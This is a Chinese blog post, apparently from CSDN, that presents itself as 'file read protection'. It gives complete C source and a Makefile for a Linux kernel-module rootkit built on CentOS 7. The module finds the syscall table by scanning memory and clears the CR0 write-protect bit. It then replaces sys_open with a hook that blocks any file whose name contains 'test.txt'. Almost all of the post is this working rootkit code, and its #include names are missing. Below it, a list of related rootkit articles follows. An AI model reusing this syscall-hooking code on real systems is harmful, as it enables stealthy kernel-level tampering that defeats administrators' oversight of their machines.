linux文件读保护,Linux Rootkit实现文件保护

最新推荐文章于 2024-05-03 19:27:21 发布
最新推荐文章于 2024-05-03 19:27:21 发布
阅读量297 收藏
点赞数
文章标签: linux文件读保护

一个非常基础的rootkit,禁止读取指定文件

编译系统:

CentOS 7

uname -r

3.10.0-957.21.3-el7.x86_64

#include

#include

#include

asmlinkage long(*real_open)(const char __user *filename, int flags, unsigned short mode);

unsigned long **syscall_table = NULL;

char buf[1024] = { 0 };

unsigned long get_syscall_table(void)

{

unsigned long ptr = 0;

unsigned long *p = NULL;

for (ptr = (unsigned long)sys_close;

ptr < (unsigned long)&loops_per_jiffy;

ptr += sizeof(void*))

{

p = (unsigned long*)ptr;

if (p[__NR_close] == (unsigned long*)sys_close)

{

return (unsigned long)p;

}

}

return NULL;

}

void disable_wp()

{

unsigned long cr0 = read_cr0();

clear_bit(16, &cr0);

write_cr0(cr0);

}

void enable_wp()

{

unsigned long cr0 = read_cr0();

set_bit(16, &cr0);

write_cr0(cr0);

}

asmlinkage long fake_open(const char __user *filename, int flags, unsigned short mode)

{

int len = strnlen_user(filename, sizeof(buf));

long ret = copy_from_user(buf, filename,len);

//禁止访问指定文件

if (ret == 0 && strstr(buf, "test.txt") != NULL)

{

return -1;

}

return (*real_open)(filename, flags, mode);

}

static int rootkit_init(void)

{

printk("driver start..\n");

syscall_table = (unsigned long**)get_syscall_table();

printk("syscall_table:%llx\n", syscall_table);

if (syscall_table == NULL)

{

return 0;

}

disable_wp();

real_open = (void *)syscall_table[__NR_open];

syscall_table[__NR_open] = (unsigned long)fake_open;

enable_wp();

return 0;

}

static void rootkit_exit(void)

{

printk("driver exit..\n");

if (syscall_table == NULL)

{

return;

}

disable_wp();

syscall_table[__NR_open] = (unsigned long)real_open;

enable_wp();

return;

}

module_init(rootkit_init);

module_exit(rootkit_exit);

MODULE_LICENSE("GPL");

Makefile:

obj-m = rootkit.o

K_DIR = $(shell uname -r)

PWD = $(shell pwd)

all:

make -C /lib/modules/$(K_DIR)/build M=$(PWD) modules

clean:

make -C /lib/modules/$(K_DIR)/build M=$(PWD) clean

实现效果:

b845f13a84138f8f168230e3c99a392a.png

实施计划
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
保障Linux的临时文件安全
11-10
存储临时文件的目录存在着一个问题,即这些目录可以成为损害系统安全的僵尸和rootkit的温床。这是因为在多数情况下,任何人(或任何过程)都可以向这些目录写入东西,还有不安全的许可问题。我们知道都sticky bit,该...
linux下2.6.32的rootkit,隐藏文件目录
10-09
Linux操作系统中,Rootkit是一种恶意软件工具,它被设计用来隐藏特定的进程、文件、网络连接以及其他系统组件,使得管理员难以察觉系统的异常行为。在本主题中,我们聚焦于一个特定的Rootkit——enyelkm v1.1,它...
linux 保护 文件,linux 保护文件的命令 chattr
weixin_34207925的博客
04-29 257
Linux文件保护禁止修改、删除、移动文件等,使用chattr +i保护chatter = change [file] attributionslsattr = list [file] attributions不让用户修改、删除文件等,使用 chattr保护chattr命令的用法:chattr [ -RV ] [ -v version ] [ mode ] files…最关键的是在[mode]部分...
Rootkit技术的主要原理及防护
weixin_34167043的博客
09-10 363
2019独角兽企业重金招聘Python工程师标准>>> ...
2024年Linux最全使用rkhunter检测Linuxrootkit(3),小白看完都学会了
最新发布
qq194582923的博客
05-03 1267
rootkitLinux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对系统的危害很大,它通过一套工具来建立后门和隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root 权限登录到系统。rootkit主要有两种类型:文件级别和内核级别。文件级别的rootkit: 一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。
Linux文件系统之文件
guogaofeng1219的专栏
03-26 7251
八:VFS层的I/O操作VFS层是与用户界面直接交互的接口,在这一节里,我们将分为写两部份来介绍VFS层的操作以及跟上层用用的交互.8.1:文件操作在用户空间,文件操作的常用函数为read()。对应在系统空间的调用入口是sys_read().它的代码如下:asmlinkage ssize_t sys_read(unsigned int fd, char __user * b
Linux 文件
Joyyzhang
07-14 3042
1、最基础的写函数 open() read() write() 需要的头文件: #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #incl
【转】linux文件文件锁,Linux-文件IO_文件锁04
weixin_31002061的博客
05-14 277
文件锁这一节将讨论的是在文件已经共享的情况下如何操作,也就是当多个程序共同操作一个文件的情况。Linux 中通常采用的方法是给文件上锁,来解决对共享的资源的竞争。文件锁包括建议性锁和强制性锁。建议性锁要求每个相关程序在访问文件之前检查是否有锁存在,并且尊重已有的锁。一般情况下,不建议使用建议性锁,因为无法保证每个程序都自动检查是否有锁。而强制性锁是由内核执行的锁,当一个文件被上锁进行写入操作的时候...
Linux Rootkit_evil_linux_rootkit_
10-02
Linux Rootkit,如"evil_linux_rootkit",是恶意软件的一种形式,专为Linux操作系统设计,主要用于隐藏攻击者在系统中的活动。Rootkit通常由黑客使用,以绕过安全措施,持续控制受感染的系统,并避免被常规的安全...
一种新型Linux内核级Rootkit设计与实现.pdf
09-06
一种新型Linux内核级Rootkit设计与实现.pdf 一、Rootkit概述 Rootkit是一种特殊类型的恶意软件,其功能是隐藏自身及指定的文件、进程和网络连接等信息。攻击者通常使用Rootkit来隐藏他们的踪迹,避免被检测和追踪...
基于Linux系统调用的内核级Rootkit技术研究.pdf
09-06
《基于Linux系统调用的内核级Rootkit技术研究》这篇论文深入探讨了Linux内核级Rootkit技术,特别是利用系统调用进行攻击和隐藏的方法。系统调用是操作系统与用户程序交互的关键接口,Rootkit通过劫持这些调用来实现...
Linux平台下木马rootkit的检测和防范
靠谱运维
07-20 1758
近些年来,在网络安全攻击中,高隐匿、高持久化的Rootkit技术成为黑客操控的主要手段,本文,我首先对Rootkit的几种类型进行介绍,主要让大家了解内核态Rootkit的高度定制化需求和Linux系统上存在的其他类型Rootkit,最后从攻防视角给出对Rootkit进行检测和防范的工具和方法。rootkitLinux平台下最常见的一种木 马后门工具,它主要通过替换系统文件来达到攻 击和和隐蔽的目的,这种木 马比普通木 马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木 马。
Linux内核的Rootkit攻击与度量对象提取
weixin_45027952的博客
05-19 485
介绍了Linux内核的Rootkit攻击以及系统调用表的提取
如何在CentOS 7上通过加密来保护Apache
08-12 249
介绍 (Introduction) Let’s Encrypt is a Certificate Authority (CA) that provides free certificates for Transport Layer Security (TLS) encryption, thereby enabling encrypted HTTPS on web servers. It simp...
7隐藏进程_Linux_Rootkit.md
这是一个c++热爱者的博客哟
02-03 581
因此,我们需要想出一种方法来告诉我们的模块我们想要隐藏哪个 PID。一旦我们将内核模块的其余部分(Ftrace 等)放在一起,我们就可以构建它并尝试它。因此,如果我们隐藏带有我们想要保密的 PID 名称的目录,那么这些用户空间工具将不会注意到该进程的存在!希望您喜欢这个 - 它比平常短一点,但这只是因为这里没有太多新内容,只是我们已经介绍过的技术的巧妙组合。现在我们可以告诉 rootkit 我们想要隐藏哪个 PID,我们必须真正隐藏它!具有我们要隐藏的 PID 名称的文件或目录。),我们还可以隐藏进程!
Linux中基于eBPF的恶意利用与检测机制(rootkit、驱动)
墨痕诉清风的博客
03-10 1585
前言 近几年来,云原生领域飞速发展,k8s成为公认的云操作系统。容器的高频率部署、短暂的生命周期、复杂的网络路由,都给内核带来了新的挑战。系统内核在面对复杂性不断增长,性能、可扩展性新需求的同时,还需要保障系统稳定可用,这是极其困难的事情。 eBPF出现,以较小的子系统改动,保障了系统内核的稳定。具备实时动态加载的特性,将业务逻辑加载到内核,实现热更新的动态执行。eBPF技术的出现,衍生新业务场景的同时,也带来了安全威胁。 现状分析 在解决很多技术难题的同时,eBPF技术的出现也带来了新的恶意利用
linux-rootkit
weixin_42021187的博客
01-13 230
【代码】linux-rootkit
ZynqMP SOC 启动Linux遇到TF卡只(RO)报错
w2insert的博客
02-11 486
mmcblk0: mmc0:13ab SE128 115 GiB (ro) ... ... VFS: Cannot open root device "mmcblk0p2" or unknown-block(179,2): error -30 zynqmp SD卡启动问题的解决办法
关闭和开启写保护
qq_41490873的博客
08-22 1666
KIRQL WPOFF() { KIRQL OldIrql = KeRaiseIrqlToDpcLevel(); //ULONG_PTR 这个类型在x86上是32位 x64就是64位 ULONG_PTR cr0 = __readcr0(); #ifdef _X86_ cr0 &= 0xfffeffff; #else cr0 &= 0xfffffffffffeffff; #endif _disable(); //关闭中断 __writecr0(cr0); //关闭写保
linux rootkit
03-16
Linux rootkit是一种恶意软件,它可以隐藏在操作系统内核中,以避免被检测和删除。它可以允许攻击者远程控制受感染的计算机,窃取敏感信息,修改文件和系统设置,甚至可以使系统崩溃。为了保护计算机安全,用户应该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值